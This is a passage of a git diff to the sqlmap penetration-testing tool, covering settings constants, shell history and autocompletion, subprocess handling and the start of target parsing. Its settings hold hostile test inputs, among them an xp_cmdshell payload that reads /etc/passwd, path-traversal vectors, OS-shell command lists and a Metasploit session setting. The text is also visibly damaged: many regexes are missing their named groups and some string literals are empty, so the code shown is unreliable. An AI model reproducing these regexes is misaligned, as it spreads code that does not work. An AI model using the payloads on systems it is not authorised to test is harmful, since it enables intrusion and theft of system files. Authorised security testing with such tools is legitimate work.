\d+", r"(?:[>(\[\s])(?P[A-Za-z]:[\\/][\w. \\/-]*)", r"(?:[>(\[\s])(?P/\w[/\w.~-]+)", r"\bhref=['\"]file://(?P/[^'\"]+)", r"\bin (?P[^<]+): line \d+") + # Regular expressions used for parsing error messages (--parse-errors) ERROR_PARSING_REGEXES = ( - r"[^<]*(fatal|error|warning|exception)[^<]*:?\s*(?P.+?)", - r"(?m)^(fatal|error|warning|exception):?\s*(?P.+?)$", - r"
  • Error Type:
    (?P.+?)
  • ", - r"error '[0-9a-f]{8}'((<[^>]+>)|\s)+(?P[^<>]+)", - ) + r"\[Microsoft\]\[ODBC SQL Server Driver\]\[SQL Server\](?P[^<]+)", + r"[^<]{0,100}(fatal|error|warning|exception)[^<]*:?\s*(?P[^<]+)", + r"(?m)^\s{0,100}(fatal|error|warning|exception):?\s*(?P[^\n]+?)$", + r"(sql|dbc)[^>'\"]{0,32}(fatal|error|warning|exception)(
    )?:\s*(?P[^<>]+)", + r"(?P[^\n>]{0,100}SQL Syntax[^\n<]+)", + r"(?s)
  • Error Type:
    (?P.+?)
  • ", + r"CDbCommand (?P[^<>\n]*SQL[^<>\n]+)", + r"Code: \d+. DB::Exception: (?P[^<>\n]*)", + r"error '[0-9a-f]{8}'((<[^>]+>)|\s)+(?P[^<>]+)", + r"\[[^\n\]]{1,100}(ODBC|JDBC)[^\n\]]+\](\[[^\]]+\])?(?P[^\n]+(in query expression|\(SQL| at /[^ ]+pdo)[^\n<]+)", + r"(?Pquery error: SELECT[^<>]+)" +) # Regular expression used for parsing charset info from meta html headers -META_CHARSET_REGEX = r'(?si).*]+charset=(?P[^">]+).*' +META_CHARSET_REGEX = r'(?si).*]+charset="?(?P[^"> ]+).*' # Regular expression used for parsing refresh info from meta html headers -META_REFRESH_REGEX = r'(?si).*]+content="?[^">]+url=(?P[^">]+).*' +META_REFRESH_REGEX = r'(?i)]+content="?[^">]+;\s*(url=)?["\']?(?P[^\'">]+)' + +# Regular expression used for parsing Javascript redirect request +JAVASCRIPT_HREF_REGEX = r'',table_name FROM information_schema.tables WHERE 2>1--/**/; EXEC xp_cmdshell('cat ../../../etc/passwd')#" + +# Vectors used for provoking specific WAF/IPS behavior(s) +WAF_ATTACK_VECTORS = ( + "", # NIL + "search=", + "file=../../../../etc/passwd", + "q=foobar", + "id=1 %s" % IPS_WAF_CHECK_PAYLOAD +) # Used for status representation in dictionary attack phase ROTATING_CHARS = ('\\', '|', '|', '/', '-') -# Chunk length (in items) used by BigArray objects (only last chunk and cached one are held in memory) -BIGARRAY_CHUNK_LENGTH = 4096 +# Approximate chunk length (in bytes) used by BigArray objects (only last chunk and cached one are held in memory) +BIGARRAY_CHUNK_SIZE = 32 * 1024 * 1024 + +# Compress level used for storing BigArray chunks to disk (0-9) +BIGARRAY_COMPRESS_LEVEL = 4 + +# Maximum number of socket pre-connects +SOCKET_PRE_CONNECT_QUEUE_SIZE = 3 # Only console display last n table rows TRIM_STDOUT_DUMP_SIZE = 256 +# Reference: http://stackoverflow.com/a/3168436 +# Reference: https://web.archive.org/web/20150407141500/https://support.microsoft.com/en-us/kb/899149 +DUMP_FILE_BUFFER_SIZE = 1024 + # Parse response headers only first couple of times PARSE_HEADERS_LIMIT = 3 # Step used in ORDER BY technique used for finding the right number of columns in UNION query injections ORDER_BY_STEP = 10 -# Maximum number of times for revalidation of a character in time-based injections -MAX_TIME_REVALIDATION_STEPS = 5 +# Maximum value used in ORDER BY technique used for finding the right number of columns in UNION query injections +ORDER_BY_MAX = 1000 -# Characters that can be used to split parameter values in provided command line (e.g. in --tamper) -PARAMETER_SPLITTING_REGEX = r'[,|;]' +# Maximum number of times for revalidation of a character in inference (as required) +MAX_REVALIDATION_STEPS = 5 -# Regular expression describing possible union char value (e.g. used in --union-char) -UNION_CHAR_REGEX = r'\A\w+\Z' +# Characters that can be used to split parameter values in provided command line (e.g. in --tamper) +PARAMETER_SPLITTING_REGEX = r"[,|;]" # Attribute used for storing original parameter value in special cases (e.g. 
POST) -UNENCODED_ORIGINAL_VALUE = 'original' +UNENCODED_ORIGINAL_VALUE = "original" # Common column names containing usernames (used for hash cracking in some cases) -COMMON_USER_COLUMNS = ('user', 'username', 'user_name', 'benutzername', 'benutzer', 'utilisateur', 'usager', 'consommateur', 'utente', 'utilizzatore', 'usufrutuario', 'korisnik', 'usuario', 'consumidor') +COMMON_USER_COLUMNS = frozenset(("login", "user", "uname", "username", "user_name", "user_login", "account", "account_name", "auth_user", "benutzername", "benutzer", "utilisateur", "usager", "consommateur", "utente", "utilizzatore", "utilizator", "utilizador", "usufrutuario", "korisnik", "uporabnik", "usuario", "consumidor", "client", "customer", "cuser")) # Default delimiter in GET/POST values DEFAULT_GET_POST_DELIMITER = '&' @@ -411,14 +701,32 @@ # Default delimiter in cookie values DEFAULT_COOKIE_DELIMITER = ';' -# Skip unforced HashDB flush requests below the threshold number of cached items -HASHDB_FLUSH_THRESHOLD = 32 +# Unix timestamp used for forcing cookie expiration when provided with --load-cookies +FORCE_COOKIE_EXPIRATION_TIME = "9999999999" + +# Github OAuth token used for creating an automatic Issue for unhandled exceptions +GITHUB_REPORT_OAUTH_TOKEN = "wxqc7vTeW8ohIcX+1wK55Mnql2Ex9cP+2s1dqTr/mjlZJVfLnq24fMAi08v5vRvOmuhVZQdOT/lhIRovWvIJrdECD1ud8VMPWpxY+NmjHoEx+VLK1/vCAUBwJe" + +# Flush HashDB threshold number of cached items +HASHDB_FLUSH_THRESHOLD_ITEMS = 200 + +# Flush HashDB threshold "dirty" time +HASHDB_FLUSH_THRESHOLD_TIME = 5 # Number of retries for unsuccessful HashDB flush attempts HASHDB_FLUSH_RETRIES = 3 +# Number of retries for unsuccessful HashDB retrieve attempts +HASHDB_RETRIEVE_RETRIES = 3 + +# Number of retries for unsuccessful HashDB end transaction attempts +HASHDB_END_TRANSACTION_RETRIES = 3 + # Unique milestone value used for forced deprecation of old HashDB values (e.g. 
when changing hash/pickle mechanism) -HASHDB_MILESTONE_VALUE = "cAWxkLYCQT" # r5129 "".join(random.sample(string.letters, 10)) +HASHDB_MILESTONE_VALUE = "GpqxbkWTfz" # python -c 'import random, string; print "".join(random.sample(string.ascii_letters, 10))' + +# Pickle protocl used for storage of serialized data inside HashDB (https://docs.python.org/3/library/pickle.html#data-stream-format) +PICKLE_PROTOCOL = 2 # Warn user of possible delay due to large page dump in full UNION query injections LARGE_OUTPUT_THRESHOLD = 1024 ** 2 @@ -427,7 +735,10 @@ SLOW_ORDER_COUNT_THRESHOLD = 10000 # Give up on hash recognition if nothing was found in first given number of rows -HASH_RECOGNITION_QUIT_THRESHOLD = 10000 +HASH_RECOGNITION_QUIT_THRESHOLD = 1000 + +# Regular expression used for automatic hex conversion and hash cracking of (RAW) binary column values +HASH_BINARY_COLUMNS_REGEX = r"(?i)pass|psw|hash" # Maximum number of redirections to any single URL - this is needed because of the state that cookies introduce MAX_SINGLE_URL_REDIRECTIONS = 4 @@ -435,26 +746,50 @@ # Maximum total number of redirections (regardless of URL) - before assuming we're in a loop MAX_TOTAL_REDIRECTIONS = 10 +# Maximum (deliberate) delay used in page stability check +MAX_STABILITY_DELAY = 0.5 + # Reference: http://www.tcpipguide.com/free/t_DNSLabelsNamesandSyntaxRules.htm MAX_DNS_LABEL = 63 # Alphabet used for prefix and suffix strings of name resolution requests in DNS technique (excluding hexadecimal chars for not mixing with inner content) -DNS_BOUNDARIES_ALPHABET = re.sub("[a-fA-F]", "", string.letters) +DNS_BOUNDARIES_ALPHABET = re.sub(r"[a-fA-F]", "", string.ascii_letters) # Alphabet used for heuristic checks -HEURISTIC_CHECK_ALPHABET = ('"', '\'', ')', '(', '[', ']', ',', '.') +HEURISTIC_CHECK_ALPHABET = ('"', '\'', ')', '(', ',', '.') + +# Minor artistic touch +BANNER = re.sub(r"\[.\]", lambda _: "[\033[01;41m%s\033[01;49m]" % random.sample(HEURISTIC_CHECK_ALPHABET, 1)[0], BANNER) + +# String used for dummy non-SQLi (e.g. XSS) heuristic checks of a tested parameter value +DUMMY_NON_SQLI_CHECK_APPENDIX = "<'\">" + +# Regular expression used for recognition of file inclusion errors +FI_ERROR_REGEX = r"(?i)[^\n]{0,100}(no such file|failed (to )?open)[^\n]{0,100}" + +# Length of prefix and suffix used in non-SQLI heuristic checks +NON_SQLI_CHECK_PREFIX_SUFFIX_LENGTH = 6 -# Connection chunk size (processing large responses in chunks to avoid MemoryError crashes - e.g. large table dump in full UNION injections) -MAX_CONNECTION_CHUNK_SIZE = 10 * 1024 * 1024 +# Connection read size (processing large responses in parts to avoid MemoryError crashes - e.g. large table dump in full UNION injections) +MAX_CONNECTION_READ_SIZE = 10 * 1024 * 1024 # Maximum response total page size (trimmed if larger) MAX_CONNECTION_TOTAL_SIZE = 100 * 1024 * 1024 -# Mark used for trimming unnecessary content in large chunks -LARGE_CHUNK_TRIM_MARKER = "__TRIMMED_CONTENT__" +# For preventing MemoryError exceptions (caused when using large sequences in difflib.SequenceMatcher) +MAX_DIFFLIB_SEQUENCE_LENGTH = 10 * 1024 * 1024 + +# Page size threshold used in heuristic checks (e.g. getHeuristicCharEncoding(), identYwaf, htmlParser, etc.) 
+HEURISTIC_PAGE_SIZE_THRESHOLD = 64 * 1024 + +# Maximum (multi-threaded) length of entry in bisection algorithm +MAX_BISECTION_LENGTH = 50 * 1024 * 1024 + +# Mark used for trimming unnecessary content in large connection reads +LARGE_READ_TRIM_MARKER = "__TRIMMED_CONTENT__" # Generic SQL comment formation -GENERIC_SQL_COMMENT = "-- " +GENERIC_SQL_COMMENT = "-- [RANDSTR]" # Threshold value for turning back on time auto-adjustment mechanism VALID_TIME_CHARS_RUN_THRESHOLD = 100 @@ -462,17 +797,29 @@ # Check for empty columns only if table is sufficiently large CHECK_ZERO_COLUMNS_THRESHOLD = 10 +# Threshold for checking types of columns in case of SQLite dump format +CHECK_SQLITE_TYPE_THRESHOLD = 100 + # Boldify all logger messages containing these "patterns" -BOLD_PATTERNS = ("' injectable", "might be injectable", "' is vulnerable", "is not injectable", "test failed", "test passed", "live test final result", "heuristic test showed") +BOLD_PATTERNS = ("' injectable", "provided empty", "leftover chars", "might be injectable", "' is vulnerable", "is not injectable", "does not seem to be", "test failed", "test passed", "live test final result", "test shows that", "the back-end DBMS is", "created Github", "blocked by the target server", "protection is involved", "CAPTCHA", "specific response", "NULL connection is supported", "PASSED", "FAILED", "for more than", "connection to ", "will be trimmed", "counterpart to database") + +# Regular expression used to search for bold-patterns +BOLD_PATTERNS_REGEX = '|'.join(BOLD_PATTERNS) + +# TLDs used in randomization of email-alike parameter values +RANDOMIZATION_TLDS = ("com", "net", "ru", "org", "de", "uk", "br", "jp", "cn", "fr", "it", "pl", "tv", "edu", "in", "ir", "es", "me", "info", "gr", "gov", "ca", "co", "se", "cz", "to", "vn", "nl", "cc", "az", "hu", "ua", "be", "no", "biz", "io", "ch", "ro", "sk", "eu", "us", "tw", "pt", "fi", "at", "lt", "kz", "cl", "hr", "pk", "lv", "la", "pe", "au") # Generic www root directory names -GENERIC_DOC_ROOT_DIRECTORY_NAMES = ("htdocs", "wwwroot", "www") +GENERIC_DOC_ROOT_DIRECTORY_NAMES = ("htdocs", "httpdocs", "public", "public_html", "wwwroot", "www", "site") # Maximum length of a help part containing switch/option name(s) MAX_HELP_OPTION_LENGTH = 18 +# Maximum number of connection retries (to prevent problems with recursion) +MAX_CONNECT_RETRIES = 100 + # Strings for detecting formatting errors -FORMAT_EXCEPTION_STRINGS = ("Type mismatch", "Error converting", "Failed to convert", "System.FormatException", "java.lang.NumberFormatException") +FORMAT_EXCEPTION_STRINGS = ("Type mismatch", "Error converting", "Please enter a", "Conversion failed", "String or binary data would be truncated", "Failed to convert", "unable to interpret text value", "Input string was not in a correct format", "System.FormatException", "java.lang.NumberFormatException", "ValueError: invalid literal", "TypeMismatchException", "CF_SQL_INTEGER", "CF_SQL_NUMERIC", " for CFSQLTYPE ", "cfqueryparam cfsqltype", "InvalidParamTypeException", "Invalid parameter type", "Attribute validation error for tag", "is not of type numeric", "__VIEWSTATE[^"]*)[^>]+value="(?P[^"]+)' @@ -483,20 +830,47 @@ # Number of rows to generate inside the full union test for limited output (mustn't be too large to prevent payload length problems) LIMITED_ROWS_TEST_NUMBER = 15 +# Default adapter to use for bottle server +RESTAPI_DEFAULT_ADAPTER = "wsgiref" + +# Default REST-JSON API server listen address +RESTAPI_DEFAULT_ADDRESS = "127.0.0.1" + +# Default REST-JSON API 
server listen port +RESTAPI_DEFAULT_PORT = 8775 + +# Unsupported options by REST-JSON API server +RESTAPI_UNSUPPORTED_OPTIONS = ("sqlShell", "wizard") + +# Use "Supplementary Private Use Area-A" +INVALID_UNICODE_PRIVATE_AREA = False + # Format used for representing invalid unicode characters -INVALID_UNICODE_CHAR_FORMAT = r"\?%02x" +INVALID_UNICODE_CHAR_FORMAT = r"\x%02x" + +# Minimum supported version of httpx library (for --http2) +MIN_HTTPX_VERSION = "0.28" -# Regular expression for SOAP-like POST data -SOAP_RECOGNITION_REGEX = r"(?s)\A(<\?xml[^>]+>)?\s*<([^> ]+)( [^>]+)?>.+\s*\Z" +# Regular expression for XML POST data +XML_RECOGNITION_REGEX = r"(?s)\A\s*<[^>]+>(.+>)?\s*\Z" + +# Regular expression used for detecting JSON POST data +JSON_RECOGNITION_REGEX = r'(?s)\A(\s*\[)*\s*\{.*"[^"]+"\s*:\s*("[^"]*"|\d+|true|false|null|\[).*\}\s*(\]\s*)*\Z' # Regular expression used for detecting JSON-like POST data -JSON_RECOGNITION_REGEX = r'(?s)\A\s*\{.*"[^"]+"\s*:\s*("[^"]+"|\d+).*\}\s*\Z' +JSON_LIKE_RECOGNITION_REGEX = r"(?s)\A(\s*\[)*\s*\{.*('[^']+'|\"[^\"]+\"|\w+)\s*:\s*('[^']+'|\"[^\"]+\"|\d+).*\}\s*(\]\s*)*\Z" # Regular expression used for detecting multipart POST data MULTIPART_RECOGNITION_REGEX = r"(?i)Content-Disposition:[^;]+;\s*name=" +# Regular expression used for detecting Array-like POST data +ARRAY_LIKE_RECOGNITION_REGEX = r"(\A|%s)(\w+)\[\d*\]=.+%s\2\[\d*\]=" % (DEFAULT_GET_POST_DELIMITER, DEFAULT_GET_POST_DELIMITER) + # Default POST data content-type -DEFAULT_CONTENT_TYPE = "application/x-www-form-urlencoded" +DEFAULT_CONTENT_TYPE = "application/x-www-form-urlencoded; charset=utf-8" + +# Raw text POST data content-type +PLAIN_TEXT_CONTENT_TYPE = "text/plain; charset=utf-8" # Length used while checking for existence of Suhosin-patch (like) protection mechanism SUHOSIN_MAX_VALUE_LENGTH = 512 @@ -504,12 +878,60 @@ # Minimum size of an (binary) entry before it can be considered for dumping to disk MIN_BINARY_DISK_DUMP_SIZE = 100 +# Filenames of payloads xml files (in order of loading) +PAYLOAD_XML_FILES = ("boolean_blind.xml", "error_based.xml", "inline_query.xml", "stacked_queries.xml", "time_blind.xml", "union_query.xml") + # Regular expression used for extracting form tags FORM_SEARCH_REGEX = r"(?si)" +# Maximum number of lines to save in history file +MAX_HISTORY_LENGTH = 1000 + # Minimum field entry length needed for encoded content (hex, base64,...) check MIN_ENCODED_LEN_CHECK = 5 +# Timeout in seconds in which Metasploit remote session has to be initialized +METASPLOIT_SESSION_TIMEOUT = 180 + +# Reference: http://www.postgresql.org/docs/9.0/static/catalog-pg-largeobject.html +LOBLKSIZE = 2048 + +# Prefix used to mark special variables (e.g. keywords, having special chars, etc.) +EVALCODE_ENCODED_PREFIX = "EVAL_" + +# Reference: https://en.wikipedia.org/wiki/Zip_(file_format) +ZIP_HEADER = b"\x50\x4b\x03\x04" + +# Reference: http://www.cookiecentral.com/faq/#3.5 +NETSCAPE_FORMAT_HEADER_COOKIES = "# Netscape HTTP Cookie File." 
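The *_RECOGNITION_REGEX constants introduced above are what later let _setRequestParams() (see the lib/core/target.py hunk further down) decide how a --data value should be instrumented. A minimal sketch of that classification step follows, checking the patterns in the same order as _setRequestParams() (JSON, JSON-like, Array-like, XML/SOAP, multipart); it assumes the sqlmap root directory is on sys.path so that lib.core.settings is importable, and the probe() helper plus the sample bodies are illustrative only, not part of sqlmap itself:

import re

from lib.core.settings import ARRAY_LIKE_RECOGNITION_REGEX
from lib.core.settings import JSON_LIKE_RECOGNITION_REGEX
from lib.core.settings import JSON_RECOGNITION_REGEX
from lib.core.settings import MULTIPART_RECOGNITION_REGEX
from lib.core.settings import XML_RECOGNITION_REGEX

def probe(data):
    # Mirror the check order used in _setRequestParams(): JSON first,
    # then JSON-like, Array-like, XML/SOAP and finally multipart
    checks = (
        ("JSON", JSON_RECOGNITION_REGEX),
        ("JSON-like", JSON_LIKE_RECOGNITION_REGEX),
        ("Array-like", ARRAY_LIKE_RECOGNITION_REGEX),
        ("XML", XML_RECOGNITION_REGEX),
        ("MULTIPART", MULTIPART_RECOGNITION_REGEX),
    )
    for hint, regex in checks:
        if re.search(regex, data):
            return hint
    return None

assert probe('{"id": 1, "name": "luther"}') == "JSON"
assert probe("{'id': 1}") == "JSON-like"
assert probe("id[]=1&id[]=2") == "Array-like"
assert probe("<soap:Envelope><id>1</id></soap:Envelope>") == "XML"
assert probe("id=1&name=luther") is None

Plain name=value pairs match none of the patterns, so they fall through to the regular PLACE.POST handling, which is why the last probe() call returns None.
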
+ +# Infixes used for automatic recognition of parameters carrying anti-CSRF tokens +CSRF_TOKEN_PARAMETER_INFIXES = ("csrf", "xsrf", "token", "nonce") + +# Prefixes used in brute force search for web server document root +BRUTE_DOC_ROOT_PREFIXES = { + OS.LINUX: ("/var/www", "/usr/local/apache", "/usr/local/apache2", "/usr/local/www/apache22", "/usr/local/www/apache24", "/usr/local/httpd", "/var/www/nginx-default", "/srv/www", "/var/www/%TARGET%", "/var/www/vhosts/%TARGET%", "/var/www/virtual/%TARGET%", "/var/www/clients/vhosts/%TARGET%", "/var/www/clients/virtual/%TARGET%", "/Library/WebServer/Documents", "/opt/homebrew/var/www"), + OS.WINDOWS: ("/xampp", "/Program Files/xampp", "/wamp", "/Program Files/wampp", "/Apache/Apache", "/apache", "/Program Files/Apache Group/Apache", "/Program Files/Apache Group/Apache2", "/Program Files/Apache Group/Apache2.2", "/Program Files/Apache Group/Apache2.4", "/Inetpub/wwwroot", "/Inetpub/wwwroot/%TARGET%", "/Inetpub/vhosts/%TARGET%") +} + +# Suffixes used in brute force search for web server document root +BRUTE_DOC_ROOT_SUFFIXES = ("", "html", "htdocs", "httpdocs", "php", "public", "src", "site", "build", "web", "www", "data", "sites/all", "www/build") + +# String used for marking target name inside used brute force web server document root +BRUTE_DOC_ROOT_TARGET_MARK = "%TARGET%" + +# Character used as a boundary in kb.chars (preferably less frequent letter) +KB_CHARS_BOUNDARY_CHAR = 'q' + +# Letters of lower frequency used in kb.chars +KB_CHARS_LOW_FREQUENCY_ALPHABET = "zqxjkvbp" + +# Printable bytes +PRINTABLE_BYTES = set(bytes(string.printable, "ascii") if six.PY3 else string.printable) + +# SQL keywords used for splitting in HTTP chunked transfer encoded requests (switch --chunk) +HTTP_CHUNKED_SPLIT_KEYWORDS = ("SELECT", "UPDATE", "INSERT", "FROM", "LOAD_FILE", "UNION", "information_schema", "sysdatabases", "msysaccessobjects", "msysqueries", "sysmodules") + # CSS style used in HTML dump format HTML_DUMP_CSS_STYLE = """""" + +# Leaving (dirty) possibility to change values from here (e.g. 
`export SQLMAP__MAX_NUMBER_OF_THREADS=20`) +for key, value in os.environ.items(): + if key.upper().startswith("%s_" % SQLMAP_ENVIRONMENT_PREFIX): + _ = key[len(SQLMAP_ENVIRONMENT_PREFIX) + 1:].upper() + if _ in globals(): + original = globals()[_] + if isinstance(original, int): + try: + globals()[_] = int(value) + except ValueError: + pass + elif isinstance(original, bool): + globals()[_] = value.lower() in ('1', 'true') + elif isinstance(original, (list, tuple)): + globals()[_] = [__.strip() for __ in _.split(',')] + else: + globals()[_] = value diff --git a/lib/core/shell.py b/lib/core/shell.py index 458c80da611..b4ae92ab3eb 100644 --- a/lib/core/shell.py +++ b/lib/core/shell.py @@ -1,79 +1,151 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ import atexit import os -import rlcompleter from lib.core import readlineng as readline -from lib.core.common import Backend +from lib.core.common import getSafeExString from lib.core.data import logger from lib.core.data import paths +from lib.core.enums import AUTOCOMPLETE_TYPE from lib.core.enums import OS +from lib.core.settings import IS_WIN +from lib.core.settings import MAX_HISTORY_LENGTH -def saveHistory(): - historyPath = os.path.expanduser(paths.SQLMAP_HISTORY) - readline.write_history_file(historyPath) +try: + import rlcompleter -def loadHistory(): - historyPath = os.path.expanduser(paths.SQLMAP_HISTORY) + class CompleterNG(rlcompleter.Completer): + def global_matches(self, text): + """ + Compute matches when text is a simple name. + Return a list of all names currently defined in self.namespace + that match. + """ + + matches = [] + n = len(text) + + for ns in (self.namespace,): + for word in ns: + if word[:n] == text: + matches.append(word) + + return matches +except: + readline._readline = None + +def readlineAvailable(): + """ + Check if the readline is available. 
By default + it is not in Python default installation on Windows + """ + + return readline._readline is not None + +def clearHistory(): + if not readlineAvailable(): + return + + readline.clear_history() + +def saveHistory(completion=None): + try: + if not readlineAvailable(): + return + + if completion == AUTOCOMPLETE_TYPE.SQL: + historyPath = paths.SQL_SHELL_HISTORY + elif completion == AUTOCOMPLETE_TYPE.OS: + historyPath = paths.OS_SHELL_HISTORY + elif completion == AUTOCOMPLETE_TYPE.API: + historyPath = paths.API_SHELL_HISTORY + else: + historyPath = paths.SQLMAP_SHELL_HISTORY + + try: + with open(historyPath, "w+"): + pass + except: + pass + + readline.set_history_length(MAX_HISTORY_LENGTH) + try: + readline.write_history_file(historyPath) + except IOError as ex: + warnMsg = "there was a problem writing the history file '%s' (%s)" % (historyPath, getSafeExString(ex)) + logger.warning(warnMsg) + except KeyboardInterrupt: + pass + +def loadHistory(completion=None): + if not readlineAvailable(): + return + + clearHistory() + + if completion == AUTOCOMPLETE_TYPE.SQL: + historyPath = paths.SQL_SHELL_HISTORY + elif completion == AUTOCOMPLETE_TYPE.OS: + historyPath = paths.OS_SHELL_HISTORY + elif completion == AUTOCOMPLETE_TYPE.API: + historyPath = paths.API_SHELL_HISTORY + else: + historyPath = paths.SQLMAP_SHELL_HISTORY if os.path.exists(historyPath): try: readline.read_history_file(historyPath) - except IOError, msg: - warnMsg = "there was a problem loading the history file '%s' (%s)" % (historyPath, msg) - logger.warn(warnMsg) - -class CompleterNG(rlcompleter.Completer): - def global_matches(self, text): - """ - Compute matches when text is a simple name. - Return a list of all names currently defined in self.namespace - that match. - """ - - matches = [] - n = len(text) - - for ns in (self.namespace,): - for word in ns: - if word[:n] == text: - matches.append(word) - - return matches - -def autoCompletion(sqlShell=False, osShell=False): - # First of all we check if the readline is available, by default - # it is not in Python default installation on Windows - if not readline._readline: + except IOError as ex: + warnMsg = "there was a problem loading the history file '%s' (%s)" % (historyPath, getSafeExString(ex)) + logger.warning(warnMsg) + except UnicodeError: + if IS_WIN: + warnMsg = "there was a problem loading the history file '%s'. 
" % historyPath + warnMsg += "More info can be found at 'https://github.com/pyreadline/pyreadline/issues/30'" + logger.warning(warnMsg) + +def autoCompletion(completion=None, os=None, commands=None): + if not readlineAvailable(): return - if osShell: - if Backend.isOs(OS.WINDOWS): + if completion == AUTOCOMPLETE_TYPE.OS: + if os == OS.WINDOWS: # Reference: http://en.wikipedia.org/wiki/List_of_DOS_commands completer = CompleterNG({ - "copy": None, "del": None, "dir": None, - "echo": None, "md": None, "mem": None, - "move": None, "net": None, "netstat -na": None, - "ver": None, "xcopy": None, "whoami": None, - }) + "attrib": None, "copy": None, "del": None, + "dir": None, "echo": None, "fc": None, + "label": None, "md": None, "mem": None, + "move": None, "net": None, "netstat -na": None, + "tree": None, "truename": None, "type": None, + "ver": None, "vol": None, "xcopy": None, + }) else: # Reference: http://en.wikipedia.org/wiki/List_of_Unix_commands completer = CompleterNG({ - "cp": None, "rm": None, "ls": None, - "echo": None, "mkdir": None, "free": None, - "mv": None, "ifconfig": None, "netstat -natu": None, - "pwd": None, "uname": None, "id": None, - }) + "cat": None, "chmod": None, "chown": None, + "cp": None, "cut": None, "date": None, "df": None, + "diff": None, "du": None, "echo": None, "env": None, + "file": None, "find": None, "free": None, "grep": None, + "id": None, "ifconfig": None, "ls": None, "mkdir": None, + "mv": None, "netstat": None, "pwd": None, "rm": None, + "uname": None, "whoami": None, + }) + + readline.set_completer(completer.complete) + readline.parse_and_bind("tab: complete") + elif commands: + completer = CompleterNG(dict(((_, None) for _ in commands))) + readline.set_completer_delims(' ') readline.set_completer(completer.complete) readline.parse_and_bind("tab: complete") - loadHistory() - atexit.register(saveHistory) + loadHistory(completion) + atexit.register(saveHistory, completion) diff --git a/lib/core/subprocessng.py b/lib/core/subprocessng.py index f2685ddfd64..97bac9bb26d 100644 --- a/lib/core/subprocessng.py +++ b/lib/core/subprocessng.py @@ -1,16 +1,19 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ +from __future__ import division + import errno import os import subprocess -import sys import time +from lib.core.compat import buffer +from lib.core.convert import getBytes from lib.core.settings import IS_WIN if IS_WIN: @@ -24,20 +27,15 @@ import select import fcntl - if (sys.hexversion >> 16) >= 0x202: - FCNTL = fcntl - else: - import FCNTL - def blockingReadFromFD(fd): # Quick twist around original Twisted function # Blocking read from a non-blocking file descriptor - output = "" + output = b"" while True: try: output += os.read(fd, 8192) - except (OSError, IOError), ioe: + except (OSError, IOError) as ioe: if ioe.args[0] in (errno.EAGAIN, errno.EINTR): # Uncomment the following line if the process seems to # take a huge amount of cpu time @@ -58,7 +56,7 @@ def blockingWriteToFD(fd, data): try: data_length = len(data) wrote_data = os.write(fd, data) - except (OSError, IOError), io: + except (OSError, IOError) as io: if io.errno in (errno.EAGAIN, errno.EINTR): continue else: @@ -77,7 +75,7 @@ def recv(self, maxsize=None): def recv_err(self, maxsize=None): return self._recv('stderr', maxsize) - def send_recv(self, input='', maxsize=None): + def 
send_recv(self, input=b'', maxsize=None): return self.send(input), self.recv(maxsize), self.recv_err(maxsize) def get_conn_maxsize(self, which, maxsize): @@ -91,18 +89,18 @@ def _close(self, which): getattr(self, which).close() setattr(self, which, None) - if subprocess.mswindows: + if IS_WIN: def send(self, input): if not self.stdin: return None try: x = msvcrt.get_osfhandle(self.stdin.fileno()) - (errCode, written) = WriteFile(x, input) - except ValueError: + (_, written) = WriteFile(x, input) + except (ValueError, NameError): return self._close('stdin') - except (subprocess.pywintypes.error, Exception), why: - if why[0] in (109, errno.ESHUTDOWN): + except Exception as ex: + if getattr(ex, "args", None) and ex.args[0] in (109, errno.ESHUTDOWN): return self._close('stdin') raise @@ -115,15 +113,15 @@ def _recv(self, which, maxsize): try: x = msvcrt.get_osfhandle(conn.fileno()) - (read, nAvail, nMessage) = PeekNamedPipe(x, 0) + (read, nAvail, _) = PeekNamedPipe(x, 0) if maxsize < nAvail: nAvail = maxsize if nAvail > 0: - (errCode, read) = ReadFile(x, nAvail, None) - except ValueError: + (_, read) = ReadFile(x, nAvail, None) + except (ValueError, NameError): return self._close(which) - except (subprocess.pywintypes.error, Exception), why: - if why[0] in (109, errno.ESHUTDOWN): + except Exception as ex: + if getattr(ex, "args", None) and ex.args[0] in (109, errno.ESHUTDOWN): return self._close(which) raise @@ -140,8 +138,8 @@ def send(self, input): try: written = os.write(self.stdin.fileno(), input) - except OSError, why: - if why[0] == errno.EPIPE: # broken pipe + except OSError as ex: + if ex.args[0] == errno.EPIPE: # broken pipe return self._close('stdin') raise @@ -189,12 +187,16 @@ def recv_some(p, t=.1, e=1, tr=5, stderr=0): y.append(r) else: time.sleep(max((x - time.time()) / tr, 0)) - return ''.join(y) + return b''.join(getBytes(i) for i in y) def send_all(p, data): if not data: return + data = getBytes(data) + while len(data): sent = p.send(data) - data = buffer(data, sent) + if not isinstance(sent, int): + break + data = buffer(data[sent:]) diff --git a/lib/core/target.py b/lib/core/target.py index b66b7bdeef6..3de535f2600 100644 --- a/lib/core/target.py +++ b/lib/core/target.py @@ -1,60 +1,86 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ -import codecs +import functools import os import re +import subprocess +import sys import tempfile import time -import urlparse from lib.core.common import Backend +from lib.core.common import getSafeExString from lib.core.common import hashDBRetrieve from lib.core.common import intersect +from lib.core.common import isNumPosStrValue +from lib.core.common import normalizeUnicode +from lib.core.common import openFile from lib.core.common import paramToDict +from lib.core.common import randomStr from lib.core.common import readInput +from lib.core.common import removePostHintPrefix from lib.core.common import resetCookieJar +from lib.core.common import safeStringFormat +from lib.core.common import unArrayizeValue from lib.core.common import urldecode -from lib.core.data import cmdLineOptions +from lib.core.compat import xrange +from lib.core.convert import decodeBase64 +from lib.core.convert import getUnicode from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger +from lib.core.data import 
